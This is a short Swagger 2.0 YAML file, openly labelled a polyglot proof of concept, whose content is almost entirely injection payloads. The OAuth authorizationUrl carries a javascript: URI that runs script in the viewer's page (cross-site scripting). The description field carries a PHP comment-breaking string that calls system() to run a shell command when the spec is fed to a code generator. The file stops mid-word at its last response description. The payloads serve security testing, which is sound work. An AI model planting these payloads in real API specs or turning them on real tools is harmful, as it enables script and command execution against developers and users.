swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: Swagger Polyglot PoC
  description: */ echo system(chr(0x6c).chr(0x73)); /*
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
